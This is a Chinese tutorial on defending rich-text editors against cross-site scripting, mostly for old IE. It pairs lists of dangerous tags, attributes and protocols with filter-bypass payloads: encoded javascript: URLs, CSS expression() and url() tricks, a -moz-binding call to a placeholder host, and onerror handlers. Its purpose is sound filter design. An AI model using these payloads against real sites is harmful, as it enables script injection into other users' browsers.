网站地图    收藏   

主页 > 后端 > 网站安全 >

富文本编辑器的跨站脚本问题参考 - 网站安全

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] 富 文本编辑器是一个开放式的HTML内容编辑环境,必须实现文字样式、链接、图片等功能的HTML,所以用户POST的内容必须含有HTML标签,但是任由 用户输入各类HTML标签,会造成一些潜在的...

富文本编辑器是一个开放式的HTML内容编辑环境,必须实现文字样式、链接、图片等功能的HTML,所以用户POST的内容必须含有HTML标签,但是任由用户输入各类HTML标签,会造成一些潜在的恶意脚本攻击,借这类情况正好分析出现XSS的情况,主要针对IE浏览器.
一.首先是微软建议我们可能造成恶意脚本攻击的标签.
类似如下的
tag:
applet
base   
basefont
bgsound
blink 
body
embed
frame
frameset
head   
html   
ilayer 
iframe 
layer  
link     
meta    
object
style 
title
script

 

-----------------------------------
类似这类
<tag
必须删除.
 
二.针对HTML属性值的协议攻击.
tag:
dynsrc=
href=
lowsrc=
src=
background=
value=
action=
bgsound=

 

黑客可能利用如下协议:
脚本伪协议
vbscript:
javascript:
文件类协议
ms-its:
data:
第三方协议
firefoxurl:
mocha:
livescript:
---------------------------------
类似这类
<xxx tag=xxx:
如:
<IMG LOWSRC="javascript:alert('XSS')">
必须判断属性的用的啥协议,给个http:就好了.
 
三.针对普通HTML属性值的编码,黑客可利用HTML特性将属性值做编码绕过过滤.
&# 加 ASCII格式
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

 

---------------------------------
类似这类
<xxx tag=&#
必须判断属性的值&转换成 &amp;
 
四.css样式style属性问题.
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">

 

style属性可以和任意字符的标签结合,因此不是<tag>的问题,必须对style属性值做过滤.
behavior需指定域内也就是绝对路径的HTC文件,危害不大.
expression可以构造不同的全角字符和注释符来扰乱过滤规则.
如:
<XSS STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:exprEssion(alert('XSS'))">
<div style="{ left:expression( alert('xss') ) }">

 

---------------------------------
类似这类
<xxx style="xxxxxxxxxx"
必须判断style属性的值, :( ~这里正则超级难写,实在不过滤的话,列个白名单,只允许某些值.
 
五.css样式style属性其他问题.
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="list-style-image: url("javascript:alert('XSS')">
<DIV style="-moz-binding:url(http://xxx.com/mozxss.xml#xss)">
---------------------------------
类似这类
<xxx style="xxxxxxx:url(xxxxx)"
还是判断协议头之类吧.
 
六.针对普通style属性值的编码,黑客可利用HTML特性将属性值做编码绕过过滤.
转义字符\ 加 16进制格式
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

 

 
---------------------------------
类似这类
<xxx style="xxxxxxx:\00xx\00xx"
搞个正则过滤\+数字的字符串.
 
七.针对正常标签组合事件触发脚本的问题.
黑客可以利用类似事件触发脚本:
onload
onerror
onmousemove 
onmouseout 
onmouseover 
onmouseup
onmouseenter 
onmouseleave 
onmousewheel
onscroll 
....................................
类似这类
<xxx on*=
如:
<img src=xx onerror=alert(/xss/)>
情况都给过滤吧.
 
八.第三方媒体文件,崭只针对FLASH与WEB交互的问题.
FLASH的Action Script比较危险,可以和用户做交互式的访问.
可以设置Flash对象的AllowScriptAccess参数为never来解决问题。
AllowScriptAccess 参数有三个可选值,always、never 和 sameDomain
never 禁止运行对外脚本 
always 可以运行对外脚本 
sameDomain 只允许同一域下的Flash运行对外脚本
<embed src="demo.swf" quality="high" 
pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="550" height="400" AllowScriptAccess="never"></embed>

 


自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论